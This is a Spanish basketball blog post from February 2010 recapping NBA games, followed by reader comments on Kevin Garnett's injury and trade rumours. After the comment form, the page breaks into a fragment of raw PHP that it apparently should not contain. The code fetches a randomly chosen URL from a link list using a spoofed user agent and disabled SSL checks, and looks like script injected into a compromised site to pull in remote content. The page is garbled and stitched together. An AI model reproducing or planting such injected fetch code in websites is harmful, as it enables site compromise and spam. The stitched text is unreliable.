La Minicrónica (07/02/2010)

08 de February de 2010 por txusma

Un error informático nos ha hecho perder todo el informe semanal así que sintiéndolo mucho tan solo os podemos informar de lo acontecido ayer por la noche.

Toronto le ganó a los Kings con un gran partido de Chris Bosh y Andrea Bargani, que poco a poco parece encontrarse más cómodo en esta posición. Volvió Calderon después de perderse un par de partidos y anotó 7 puntos. Enfrente, unos Kings con Kevin Martin como estilete principal pero con malos porcentajes de tiro. Tyreke se quedó en 11 puntos y aunque repartió 9 asistencias perdió 5 balones. Sigo creyendo que un Calderon-Martin sería un gran negocio para los 2 equipos.

En el partido destacado de la jornada, los Magic ahondaron en la crisis existencial de los Celtics y gracias a un tercer cuarto memorable se llevaron el gato al agua. En los verdes, una vez más, fue Rajon Rondo el jugador más destacado con 17 puntos, 8 rebotes y 9 asistencias. El teórico “Big Three” se compenetró para anotar 14 canastas de 38 intentos…

Comenta

7 comentarios a esta entrada

  1. pcerezo dice:
    #1

    Es una pena ver a Garnett arrastrarse por la pista. Con la intensidad que le ponía al juego es incapaz de moverse.

    Pablo

      Citar

  2. Vader dice:
    #2

    ¿Se sabe algo más sobre la lesión de K.G.? ¿Se le espera 100% para los playoff? Esta clarisimo que sin un Garnett a tope los Celtics no son candidatos al título. Espero que se recupere porque le acaban de renovar justo este año…

    El trade que comentas seria un buen negocio, pero sobretodo para los Raptors. Los Kings creo que estan confiando bastante en Udrich que debe cobrar bastante menos que Calderon aunque igual estoy equivocado. Hablo de memoria.

    Por mi parte estoy pendiente de si finalmente se concreta alguno de los traspasos importantes que se han ido rumoreando; Jamison, Bosh, Iguodala, etc… alguno de ellos podria cambiar el curso de la temporada. Sobretodo si son Cleveland o Dallas los protagonistas.

    Saludos

      Citar

  3. pcerezo dice:
    #3

    Yo creo que Garnett ya no va a volver a ser el mismo. Tiene la misma pinta que la lexion de Webber. Esa rodilla tiene que estar destrozada y ha debido de perder el 50% de la movilidad. Una pena, comparar la intensidad que tenía en aquellas finales de 2008 con el partido de ayer es tremendo.

      Citar

  4. Vader dice:
    #4

    Pues con un Garnett al 70-80% y forzando el playoff igual podrian hacer algo pero con menos que eso… Lo dicho en breve a los Celtics les puede tocar empezar otra vez la reconstrucción y otra vez la travesia en el desierto porque tienes sueldos empeñados para los proximos años. Del Big Three el único que este año mantiene el nivel es Pierce, que es el más joven aunque ya tiene 32 añitos… O este año Garnett se pone a punto o como mucho el año que viene aún podrian hacer algo si se recupera del todo. Si no es así lo dicho, reconstrucción otra vez…

    En mi opinión de todas formas habra valido la pena la apuesta por el Big Three aunque sólo se lleven un título. Ganar un anillo contra Lakers y despues de tantos años paga todo el esfuerzo. Despues de todo hay muchisimas franquicias que ni siquiera han ganado un triste anillo.

    Saludos

      Citar

  5. Love DEnise dice:
    #5

    Opino igual que cerezo, creo que Garnett no volvera a ser el mismo, como no lo fue Webber, y como no lo es Elton Brand. Creo que a partir de ahora nos tendremos que acostumbrar a Garnett en paln secundario, con algun que otro partidazo, pero mucho menos killer.
    Vaya parcial de 3er cuarto le han metido los Magic, donde en los ultimos partidos, Vince ha jugado mejor.

      Citar

  6. Viva_Dirk dice:
    #6

    Yo con Vince al 100% sigo viendo a los Magics superiores al resto en el Este, dando por hecho que Garnett no va a estar a ese nivel.

      Citar

  7. Txusma dice:
    #7

    Pues el de ayer creo que era Vicen al 100%.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>